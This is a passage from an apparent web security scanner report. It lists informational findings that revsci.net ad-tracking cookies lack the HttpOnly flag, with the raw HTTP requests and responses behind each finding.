rtc_l12s=MLsXtzE1JhpnJ5HL3vzIqKPpyVrMNHGJvojUnXJXjAPTw+wWY7y45WrIsWOW0pLnHqged2X1aG4UUDn9Sek+jWM8P1olTSqSNdTxgq4nDCLC46xOmx6IxR0G+VNWGQbABRvHHzaaDDvP1ShHKDO+zvcRVLpuVzsu6kJRzFShOfPi4AZtXaq9wwNOY4bZJbpnQFEN2TQ7KRTJ8rBfM+g/kHYUL2Ae3wgujF11mbMMKQr89J+G+C/NiNon7QlzTW4lUrhT/X7stCdA9BMHH1OB6MF6HbWJ0cQ/0X2jT5wzlPvyjJSkUy36zEuwbe6aAJz48vioAYl7/RCc8hUm2CzJ74HAeaLJSxsFldBvKpKMSD4SvvbwRrNW97jjItImf/7r6+YNiPrIEahdhi8irCZzdYxsUhb6S2TvV9GnAQLVKE0b3HUva+XdBygoiSki7pU4xDIBmEPWSoq0KjkP9KA7LSna0eWtDw/RSSai0UKKqd0S9fhoVNvjUacZpD2D5le29IRTFAGcXd8G0ZDkDmuaoQbCCh71MD89MUyUx5FeHFOVPe6aSt8MI4EScP0nWyrHPghHPhppBbiTYOC1ht8uwbe2RddumDuzthrhuL2keoEygiyjtrguUx5lbg/95Hr5CN+XzqzjCG22CIaYIj1pHLeEkU/mQUSrL8mDB5n0OqlwMO4EF/zX4I6qKLZjjqsBoX78SrQgsDgLMt+h/t5BdC0Wa4hBjdkmG9BsnkNjuVOaRewamFoSlheDogIfDzIeET/8ep1AmSBCpjjvQHnOm/XdraatD89cjXmQxB0k03vOAWKL8pdJiGnYCWrQxdCk5b/NEC+imR9+1fiEPafYzCOFPbCRYsYlbzC1jdG9EFg6iOyrgrMYyT0+1bHZVSDVIxwDoTibsji3sVzNQzfkIJo1LEF1z7701aurKcGIIyYgVxrloABacahXq/Ckw8NcwvJGclRMzEmcIJ5KsxUFR4zynbONfhk//QMFIs0f948ePudxN1zPw6UVAdDYqpRYvHQo0EjST1TVhNaCBRjEbPPjwYbD1H8rGLmFC8+5rCsDt5DAFMr11/jsEWaaeh5jmD4IZLV7HnYac97sKKMm87usSK+qwCZvqO8FAq6SMLqOQp4pdu3qjzzZfxkmj1yYZK5rX3ueSZ5im7eKEAR2ivqUf14W3a+jPcNN7jn+lBDenCKYTsI2UHmKPjjYM9ItpZgr23PwZo0Qj+w6Qxr2+SLbNSRfEhyPDlStkVOaXRL82ELXFpkI292WNIWl/kw/UGrbcwSnHVycDL1LqO6SAxM1XA7+Bfm3qlit3MWvkBFO4YvTZ7jPKnzvQpsNRrtynBzQXJ3EULenVbdm1Z2XNYEQSpejpAgfvjN0W3SO9NW64LUXVscn4+mQHvT6iwuWe+bEsn4u2ZYI807tt2pRK+61OI952t5g+PbC01/Z3uVyvF8deFb9TNvHwOMA6AwViI10J+5DtA==; Domain=.revsci.net; Expires=Sat, 05-May-2012 22:35:37 GMT; Path=/
Set-Cookie: NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b9&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Fri, 03-Jun-2011 22:35:37 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Fri, 06 May 2011 22:35:36 GMT

GIF89a.............!.......,...........D..;
18.137. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07710/b3/0/3/noscript.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07710/b3/0/3/noscript.gif?D=DM_EVT%3DCSM_Expedia_LP HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=naush134;u=80312807C795402E93C5016D2A2A3E1B;ord=7169916033744.81?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4ddd50a2&0&&4db7974a&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4de2d7db&0&&4dbcd64a&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; rsiPus_cUAg="MLsXrtEupC5v4JDWbm5SF4iCa9rxq92nU/WOr6kAXZYdLpPAQvnyqW118N7oMEOiC2a+Qitt1jCSQnt7wOLuFf/9TQPsfq6IyG5KAtGyxR3fC69ZIS1PEfZ7+RJPbmgi5/Do4ttQz08XO1UZi7xW2INSPBRMu/rnPp04+54Ys4dei76PNAqSipahtYUfnrULkB+5OvuWzwKUC5dvku8yoxjK9eqMv+qsudi6yDI5p7sjklqfA/Df4499H+aU47uX/ZStvm7s0bSjla+AwzWAysWR5lO0C6CV3XcHBk4XAJoLy17PEAhkXQrA5UZbouz0UH099/lxSt54s7u/1vi/Ooc6ZsdHYnkAmIE7OjXRhH5swOnx+Qe7TQNTY5avAup317qWXxpxHGJHaYXIBQgZDvVvP1/FdYHpe4ELzEm01fLjZ3NRUu3RLcxJe/LWkVmHz79Zn9KKPtd8TZxCCYd1SF0BsJd/w4RxAXd8u6LUBqIMTYJLRCFBZYAqfyg3pMk+tHsbPBAY+t4e0y5XfrgZeOS5LS0raNTRDvmgWWyrK/P3YcYuQx+1XxK1YTDnTUoMKeILlN/WyNsBDbEYkH1exWL76rR83Bi3+v2FqFxztf6n5/2gdRHjcEt9bVnJ4z3dKF3kglsKfCM6oHY8rFN7qcjUzF9dx5DdQ3yk9RA="; rsi_us_1000000="pUMdIz9HMAYU1O2uQ7bkS/GtHFajpUjRHJppcTQ/E+fDv3TBS3u3eKtw/qV68iFxwFHQSUXJh/TEDlqK5ymryWN1lLpjgHRFDSYttD59YZFrXOXgP3z1GpnIeFgtFDR1F1h1DvPJ6jGxiMDbAnxQhvYqAwMe3iYLqU5GS2b8LfrTbx7uRJOZcXZTF1nqAhc9j1XANGppgAkqLrW5J/DkaoiGFOnArblFlMxnIUs81A34N/6VKULJ5NXcgY4g9jLOtCz0A2zRfBV0tB6nig79jyxsPK/BtufPnOuytnDMGwwiEdVEfx6xS+gdhVS/YoP8gws4gSC0AJdMoSjsujh74M9+Fuy742S9LEO0odVcgP8nwKkbsPsv3MIMTgRwUByQS0+3PTu18ZNX15PFr3nkMs5yPDt2381kVtM3tUsb7UTaDxWlFawllYsd+K30dHBKmeOvEyOfWttKqC8T1WwfifCTg5OqGJEWYbTZJKrVqzIxoqCSdeInRhO8LVs1qCHv/xxr5klEDkmKfHvF3yACOKWqmWc99TGbMUwf1jXvnMacDDEIRle75AsgC1t0n9TOjQlEvQUGZUlrBNuwrAyA8WHgji5OTrwi6ZAOSH/kv/L1brD7LtY7KfEaHdjvNdTzvoBUQMG4UTO6tV8OPsAUbmXYKs6T9V0kUdHDxS5IPWKMbw64OOcJPQgyRxyqJsiuBp3dvkWmsDV+KduhariE+vHGWgkxjV3chDQ3HlznmZrWkDHUMxVsE5mlY8EEUQt0ADLtrW3uR1r4wH3z3ZIdpJAGNmiIVyRr2c2b7jtBhTZxAAlNf7l7f35RlM2r3iTLGaF16IS79K9XrMEkuBHsy/k9wS+yaRUPCDErkqNr9YH2bA5/m2lDsmX2vxXhzSVPIsZH46KEZTqbjaFkaMVUv/ITp08VtIAQ1Yvu8ZknO30xfvR4vAy1AWEvvRf2fTQTa86Cxadw7P5qlBPGbbc96CWkKYIaCHYlvv56SO55p0Bo3OSWyjxverGSQYL67FQcst0Y+Jf/kIY+hq/65Cw5pVhi+rOWA5T/otP69RNqpLBD3wut5wpUIOU3A3cz+Fww/cmAfldRXnDpjDHyOUTv16cufUECTFP4HtE7b0vSWonFxeUXUs0PotTR+7l6VjT1pd6km8G3O6Jy+CinadIyS1ZkYM7x6spOGE5UiyQvx8Zs2WjO/p+duPiDfcEZGtR+HUDufru+EUMxg4w6AcWPnyFQbFw5FZSvULDb31fy7NREGAnb8nazQEJ7uSv7XT8wDJIORNgj0zbeAPjKWAlyPP3oRqS3CgRk7KsmlGuzBtB/H49kpYMT"; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de3fbf4&1&10592&4dbcb06d&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9SEJaSpn5l5JKLO/U2zMplZx83H/bTC237PZPP4jQ9v2WwWS5cZka6FAtm4beqRWw/7FAzLkWXPgIi9Fdj34GJWiNsniOfS7N83ZJCMm7XF401Ak8vWIo3drFxdzUB2XmgOG9ISdXu2T5qiaUXtX5k07+zndetYCXU8uC6WDdbPbEoqZPrF3A8T56voczKp5HJXWppbAhBOpR1Q3V+n/B2dTNvVt6bTFoSl77GnSK+qm0rWdXpvZj5nqF2cft+CWWWDuF/5dASzKewgNKgf7RGFOPCpManPIHMt+4GfyeyPj5zfWNagNFpEckaIJcjc/Ype13DXWWJ+NDW6eNgR8bMyM9Zyz072r8TEAb4Q6wuCg6JC9maofi7MA7OH6/NLciMiiWIPt8V3CxjGnvuXNCsiiDDRDBsuvovIfC96g8LjpthMERi2dozqvhqKIWEsI/+jjOokTawe+rOS60DvuFWr7xsmQPQ+SwE6r+YYXbd3vWeDASYs3zZtgvziWdAwte9TTiQBZeQXMTcL+DH9/78GPE9gQXBY8H1yIDrQ2D68pY3wJmxiV81hz8iDIvqb3GO8EGeZm4kkirwWY1y48ApPVV3IiooXmVPD/xqlUB3XTtm74uulyjk3u6tiKLhMW/7hI0e/jJ17wGo+jgDKCuhaLWdBFwJUWwRWx/BfDZPZrSBLyd5E2jsyn0CtLepyVG2cd1tG1FInaSzBIckUsUbtgraQxhFODw8c0zBy7NOpwEDbGlzNg706flbCLyeANNyYedL1yZOFdplAJIgatt1S4HP6ZgoTEYK06y5+Np0yeHwjqX8uABNrJoH64bFZ8dY9PUtvCG6BNUp/4TINt6lfLnHCBk6Lq5CsUWRP/xPHGguJgxph+ru1g39Q9ELp+QH5J+Y6GoagCsKnJ1mVojp2RB2SwpbIaUPj4Hs9GDc9gUII4rbh4UJH2lmuKuIsMiheOLb6nsyiPGG0fkLn69U3w9lYopzQ9ulijnNkB2BmMz47lmgqJGWZfpzEcQPnUHkt8ubqpZp+ZvSRL1RdIFxVDS0n6A5NHnEWA9Tfhcb4v2tm38busuHAMXI39qv+Ulc4Qmd00nAJFaOb+UJSeHqTI6MD0faH5M2yZGoe/nbCt/+tX3tqNs1zPSmFTZokZkGS09goch/NIwev3f+oHX4J0WMaqS9PKtP8lO8hGdDnAvJppuoB9kTbXAKSD8Fdvn5/0kdBF0xzfU0wKy+lLEkHo5MA04LnHERHrjGPOyYwO; rsi_segs_1000000=pUP95EOhd3IMNuIt3hImjtBr3f9Jmb5iQhGs79BvVK7gu24M13aZJ2D+tFQjW0rclXTtqlkFZC/RGdmRR/4yaoTlo5cff4Rcr/+KQ7YRq/KMfHTmx9MgSKmkFLbXwPK0kXUImijR4rCX3gOgXBEH/00jHpa+cDWX8tWhU3vVxQUSWMjj5TuBWOb+ly0AkAmMNi2m9U1Hs1/NIBc5o7mOWaASpv4mL4iRx/lFdcMEVtTN5gdhw8pbpEKrgTcOcfeijYOxJfl4USRjf8UQwK/9sJMSELY9oDs5/k5Oe3tZLe1UQQtH9f/LparzoFwB/cKqjXlcBnvxlAT4bjCMR0BIHekHuZldbCrdGB4ynaq7PBft1KdDfaf/hwTH/QV73XV4u0Y8O7bfcbdZizyl+2nPyZAR+k8cYxFwRT1wvJqLXVvnaKUAWH2t4E7Y5ryRTkSsfgM4k90EMUzQHWtK+kwC8vnZfKxthyb4liQ9IBBXbA==; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; rtc_22BH=MLsPtzE1JhpnJ5HLbtednoi0nCpKJlQQWwKX1s/hvto2CE2GUWSJvSl52PQqi52JpBK4GnVp9CADUVhC8UihMt47Kyqg5IhBs75AaGyI4DYeLzjpC3rGpxqcvluEW5RAzB7ukfIPR4OGlzUZaYCGAvr17sdnY7AbTj6bR8m0lkMpWQitVrl6tCXz9Dh8I00+4Uhv+5KZehhO7J1Fdf8+QBBQieU5F8S8bbaNk5nC4l37+T5FikDtiyevFoAx5NrjUqt3UbgM/vc0QAjVaq7FwKjOT09N86ggJ1piz3sJu2MfTd4RaLdhzRHVkggW/iopdcYYYAt/RfWuturE1q1oTvinK65+N/x2hab9/eP0oWcsum2hzuxAeqHtHg3b+tGIws0eS5gTLLy/M0X9T4Ga2YGkr7Imsq72334mpsJU3ITPD15sED3jjgsoo5PQVhoxccYWTZtOhtZD//kWYdVag2XS/aNF2czvTVdY41ak6VvAIID5L72S5YZx8I9eb1iG2qUtCebgX126P8fKKx3NDq3+3y4OBSqA4P/vlFZNkmOLKZlG7NBuMfxhK3/utr4v4+oot+42eGJ6U3VIFmS8vGMVtyqElhDe1yXccYYba1Jf+JZuqU/G8kyYkZOW3gYusdENbwrr1I4iY0fqmb57UjMxhLxWKtL9dI4ieIVOkYPk5TTpNwtvewgk25Rbg8EBpUkI4o4ewEOuV9VDDOZTmipJnobSmVfIAW+Y1nrV3CphE/vWKTOY2ZSh/4exB+QcPhfdeYDIbXAzqBjvAG+G1ovPHCoemWENb8p82N1Z/B4syGvLxUyDS35Q8NuZkCpMX7PvWN7XeA3SA/gKz/PNzojFZMg8t42QL1p47Onf24+Cy8y8vBfYSyiEt315Peuuv9MWFJ2TNUTa64jL1TzO4K5ilgRExd+0+LlbGZlWA4nMGcHybm4hueGOeQPqwAtQ5/kaVhSwI64CwilQnKAWkuN8F3BvimyTfR+gsJitMuBBeYXut8bYUn6pvsdSjm5Iz1FG6u4dVw/5UIF7a64Ro2ojiGOLZRgkjmaZRNRsXGGpbYUuvyJWJ1CvSaQIkqMXoboWAujPOYGbU5YpdL/ojwzUfBJ93G7WdKliVinQOzR/BaMAWOKY8duhzRzGBeKtEhSpH6ZyBf1lDGxsVh2hMyjZMD1gu8QRCSU1ukmkmHwVwCuUYbBjs5y5jJUMBbAPRiSE6+TU2D2lHN/QhrBJOFYxqRtUuNsvQu3E0BTI3wXaWGeLD+Ed8LYRr30k3k67AKIXa+Rwh6gmXjGuGWHAiYhfiJN5iLMfS9ccBAVHQwXAPlizOwEWGEq2ilZlFFJYcfiz8Tte1jn8xS45JcbJq/UGTlqG7486giU7j7viLctVk6bOgD9NWLuh

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_22BH=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJEOheXIQVvUbea77ILtKCMcszrEaENQEjT7aRHs5MiPNnNbTwCoB8veynCLwV+0cKGSNJfviaRS76OdgBcRTHuGZp0mWAn1EpOUI/ShNV7vHAVsJedu017S1dkoLY5H4Le0WO3JicknTxsOn/o9PTLz0tba0+e0YuYVfApkK1z+612SNrqZAP7vkZoWH+PGgzZ7+DLapvhC1ZjPlIuK+MbylPCF7hhhHNirmG+ViZWCfBUFZgh51jkrN+lduQho5P/OQ5DN6QMBPOIfTUdfPAnHQEOxj62Zx5+tL9ciLqJ95kZmpzpw+s497N82TjVKL4xsXgmJPlK2b3ksV0A6vIVl15Mzo6cez9TOlt4e77ktoRZkzw4/k3KTKs/BGC3Kukzgrbhw3ckJ5/EJ1625ddtFcIBlnAS1v6sG/ucZ3wM7B8+MbCqQn6Nmy5jljKrSS7bzpaAEnHqBQCotsGvXwmUCzfZT9Rt1wt9SAdomdbOPfUH/rhnCyw9iRWAvsmgLqf7G0jgRz578qzqg=; Domain=.revsci.net; Expires=Sat, 05-May-2012 22:33:37 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_D1vC=MLsXtzE1JhpnJ5HL3vy4noCEnCpKIFSIvojUnXJXjAPTw+wWY7y4JWrLsWOW0pLnHqged2X1aG4UUDn9Sek+jWM8P1olTartZdTxgq4brSjtMRLmv63at5KmReuQqY5QDIJXFnjMUw1S6PRlodfSKqqb549UmkRkjTS4D7LGgrhCL3lL5sZRNA+0k1B3YjoeaeaOl3QWNZ2a7mA3OgkBUNPumfPRDwbrh//vRruydeGes5LgcdE1mHzNbyGKVucdIsKbpRfqsrunYbeWzxOrvYl+JoYbGAl5hFOkyqe/Ll6/+N11WueF4sV7DgZCPfDYYbacKsM9DRFLsZtmLc+0rYcryVOomm7rJiwG4w26IrIRlkjgSGRZAiWRwQU9wIg1FIEZhJmvWaMHPl8dCwW/tj9Ps2XzN2EmkeA62/n1vdDz1ecGFVDJtnJyhQc2mLlrsS4li8KDipPiD0S3WzWXXQzN9igS8uFhhnxf2qqZVs20Blh7sbphtzyddDrjO5Jnc9bvqtayg9y/jXxGwcHr7hfMfCdMtli6EJLspKye7WsZz1GCdxuwBOO31Qpxlw8Y17stUYR0v0Hqq02A58AayAhLJBVnnxcH+Jqi2+3mWnYNm+3ywiXLxtdbQ75QX0RrcTWSmggv8B6eFRmOZYMUrVkwZiFtUB1nGGJZH3iwDWK3ln3rmyWUSJYaWVs+G3/KfBTBH3q3otOcVRlKrpiVd4OKl7D3o6o6HKBUO3wTOMZ8QkCta8DrRLJyw1g6WZG5tL/CesBKfPj1fOaT2TmAqkShqRa4aVuVJ+/p+aADjwtQ2/sVt+lYlYONpoeA6ewHD7G6ojL5gt4ljNIEBu7naRBKd6pbNVjGWrq9+q+GbeONKjg1NYXQR+zBkuqE3sdUFe7v2pXPavI8sooFafMIX7bfS/4glvvxSPQYjGmeQUIlGv6ycJlA+lhens349f2FzSDPsdZpiayxm0eCynxOP1PfR4ZkeqU+m9yD30+QiCwIkQuOuisaWndLK6pbIeUg2OrfdzBTs1APAA05GGjeLMPl6jc1jwIfaeAHqN7a/sSmy5jwHya3KYtMlmydCdA4FjOMTNFm/HVKd1dgCSb2c5fsYMhc9nE9TJFq+FEp13f7mm2KArOCk/OB7aS9k2HQXoIckXFQXtbtTMhVz2KejL4/FFQ7XAReGk+GdP+mn3ciXr7rjqWTyoYP+ZIlkjuBUI8dd/NU1bPYkcO3+/ZvOvmJnz6BKLf83Dmj6668cLLwC4yklr47tG4CCDGYGLMg/pzlhdDHouFcWKWxGi3RhS3LWSYMjSK2wNK24oAHuoR2EvMIFn3vi5cAmSvoEeQwxD29VVdpnB2IW6lbK50Ucm8o/g4QL1JYTd1hkwojD0PZvNBRTxbxP1832LgaQbffnd88uLkbFvQZPJBY/7Js23zW2Tb+79fSEO/e5DSjKAJf101JlAmCyTjoTzeb32SdjGmQ; Domain=.revsci.net; Expires=Sat, 05-May-2012 22:33:37 GMT; Path=/
Set-Cookie: NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96141&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Fri, 03-Jun-2011 22:33:37 GMT; Path=/
Set-Cookie: udm_0=MLvv9SEJaSpr5f7vw2mLpmzMplZx83H/bTA23MNZPP4jw/v2WQWS5cZka6FAtm4beqRWk1TBAzLkWXPgIi9Fdj35GJWiNsniOfS7N81ZEujq9WInL6CjZ2RixWByWay9/qZBmJG/h0T/GkG687mKYLw+KrWEBC23eApyddc5/G3qMt7/xWloMU8LH+PHnjVDhPprP5kKHo4gdfNj4D0XTUdudQQtpUNxiBu9cld/a0uUsmHasDvtn14QvRL+CTaT587Ude8ov8Ol60KWgUDqX8llyLiH8Hb4SO0kYYba9GwSdSE466Z3yvxu10vB37aeLUOEUJRj7lJSjTepGmjkUZrlyiBj9mG5vyoZZH7QRKGhVy2b6DU9CR4MDuauMlt2IarprTOIayhOm0+t3HXzfy2FNTZLchjhG7LbBwLYrG1SttfAhrMOt1kSNZ3uE/WD8QxLQR3++HaRid3va7wf9DujPz3UuDEqKquC9MVL8sE2nfBjdEm7VDQIjAb+0EkJ1YoHQi52+1zF5xUK/Nm4D3TTY9RJJbu4firLkwwQGgYcvV3sF0nuy7fQKB5BaGJAD4YIKDrUTKB94wb4eMZnF9tRTDmkfSkRmyeIFbR9PSJrw3IbxPEKFEPSl1Ji7uf0vaiKv1DpVK9ncjXkKV63t7VC76HrCHg9/+RhrizrKHRRmr9UDaxdAQKRmfbaUfaxXXdO1JveXZ6Ppwy4nnfCMk0gJxHNJLprKz1xYLTGMidpRQQtpX9sBETXiDgLm5yqnYHM06mFNGTxojhAKggi66BIEVxHHHGYtOgvefjanret2zxF15KV2mKtwHesIwYKIYhI+9yiwKBvY2I+042xco5PbTAhjeDDiTGo6hhj7RXGwIY5JDqPZrBzAhRZEHf6S0zZVAUgQxerqQWm71qDwsG5XFmCncT97jqauYMFUnMErlmh0dCe6EuiP5HFsBXjVHKjCeWv85WM1Zwj/EkczsgJW+FqvnoIpeXkmeMaRU1ecboP87jYqpKUvBTjuxCPSadQ/2JHAACO2Aj40/v8mVOwtr50DwerWx0BT1brnynWhUoV75nzSMHvdT3uEVN2z1O9+ij3NuGGdbC9rS7XUh8bgAuTxhPD+HRJ/+ESHCx7aK8JMl6Oh+WWCar/QVNDspoNPq/X4PQG7t7JXh+Zj8cU3J1YZyAEGE20X95wZELD/w29ILgUDw+Wp5UjoD15xFTlt2Cc2g0iA7Dsvi4w2FJ7Ln5S+2i9FfpJEGKT+I5wzuiZAtfvHwlyAGPZ0tqvSyRRMopLCB5mVzSGo5567rV61Q==; Domain=.revsci.net; Expires=Sat, 05-May-2012 22:33:37 GMT; Path=/
X-Proc-ms: 5
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Fri, 06 May 2011 22:33:36 GMT

GIF89a.............!.......,...........D..;
18.138. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07710/b3/0/3/noscript.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07710/b3/0/3/noscript.gif?D=DM_EVT%3DCSM_Expedia_LP HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=naush134;u=9b6b0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4de2d7db&0&&4dbcd64a&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; rsiPus_cUAg="MLsXrtEupC5v4JDWbm5SF4iCa9rxq92nU/WOr6kAXZYdLpPAQvnyqW118N7oMEOiC2a+Qitt1jCSQnt7wOLuFf/9TQPsfq6IyG5KAtGyxR3fC69ZIS1PEfZ7+RJPbmgi5/Do4ttQz08XO1UZi7xW2INSPBRMu/rnPp04+54Ys4dei76PNAqSipahtYUfnrULkB+5OvuWzwKUC5dvku8yoxjK9eqMv+qsudi6yDI5p7sjklqfA/Df4499H+aU47uX/ZStvm7s0bSjla+AwzWAysWR5lO0C6CV3XcHBk4XAJoLy17PEAhkXQrA5UZbouz0UH099/lxSt54s7u/1vi/Ooc6ZsdHYnkAmIE7OjXRhH5swOnx+Qe7TQNTY5avAup317qWXxpxHGJHaYXIBQgZDvVvP1/FdYHpe4ELzEm01fLjZ3NRUu3RLcxJe/LWkVmHz79Zn9KKPtd8TZxCCYd1SF0BsJd/w4RxAXd8u6LUBqIMTYJLRCFBZYAqfyg3pMk+tHsbPBAY+t4e0y5XfrgZeOS5LS0raNTRDvmgWWyrK/P3YcYuQx+1XxK1YTDnTUoMKeILlN/WyNsBDbEYkH1exWL76rR83Bi3+v2FqFxztf6n5/2gdRHjcEt9bVnJ4z3dKF3kglsKfCM6oHY8rFN7qcjUzF9dx5DdQ3yk9RA="; rsi_us_1000000="pUMdIz9HMAYU1O2uQ7bkS/GtHFajpUjRHJppcTQ/E+fDv3TBS3u3eKtw/qV68iFxwFHQSUXJh/TEDlqK5ymryWN1lLpjgHRFDSYttD59YZFrXOXgP3z1GpnIeFgtFDR1F1h1DvPJ6jGxiMDbAnxQhvYqAwMe3iYLqU5GS2b8LfrTbx7uRJOZcXZTF1nqAhc9j1XANGppgAkqLrW5J/DkaoiGFOnArblFlMxnIUs81A34N/6VKULJ5NXcgY4g9jLOtCz0A2zRfBV0tB6nig79jyxsPK/BtufPnOuytnDMGwwiEdVEfx6xS+gdhVS/YoP8gws4gSC0AJdMoSjsujh74M9+Fuy742S9LEO0odVcgP8nwKkbsPsv3MIMTgRwUByQS0+3PTu18ZNX15PFr3nkMs5yPDt2381kVtM3tUsb7UTaDxWlFawllYsd+K30dHBKmeOvEyOfWttKqC8T1WwfifCTg5OqGJEWYbTZJKrVqzIxoqCSdeInRhO8LVs1qCHv/xxr5klEDkmKfHvF3yACOKWqmWc99TGbMUwf1jXvnMacDDEIRle75AsgC1t0n9TOjQlEvQUGZUlrBNuwrAyA8WHgji5OTrwi6ZAOSH/kv/L1brD7LtY7KfEaHdjvNdTzvoBUQMG4UTO6tV8OPsAUbmXYKs6T9V0kUdHDxS5IPWKMbw64OOcJPQgyRxyqJsiuBp3dvkWmsDV+KduhariE+vHGWgkxjV3chDQ3HlznmZrWkDHUMxVsE5mlY8EEUQt0ADLtrW3uR1r4wH3z3ZIdpJAGNmiIVyRr2c2b7jtBhTZxAAlNf7l7f35RlM2r3iTLGaF16IS79K9XrMEkuBHsy/k9wS+yaRUPCDErkqNr9YH2bA5/m2lDsmX2vxXhzSVPIsZH46KEZTqbjaFkaMVUv/ITp08VtIAQ1Yvu8ZknO30xfvR4vAy1AWEvvRf2fTQTa86Cxadw7P5qlBPGbbc96CWkKYIaCHYlvv56SO55p0Bo3OSWyjxverGSQYL67FQcst0Y+Jf/kIY+hq/65Cw5pVhi+rOWA5T/otP69RNqpLBD3wut5wpUIOU3A3cz+Fww/cmAfldRXnDpjDHyOUTv16cufUECTFP4HtE7b0vSWonFxeUXUs0PotTR+7l6VjT1pd6km8G3O6Jy+CinadIyS1ZkYM7x6spOGE5UiyQvx8Zs2WjO/p+duPiDfcEZGtR+HUDufru+EUMxg4w6AcWPnyFQbFw5FZSvULDb31fy7NREGAnb8nazQEJ7uSv7XT8wDJIORNgj0zbeAPjKWAlyPP3oRqS3CgRk7KsmlGuzBtB/H49kpYMT"; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; 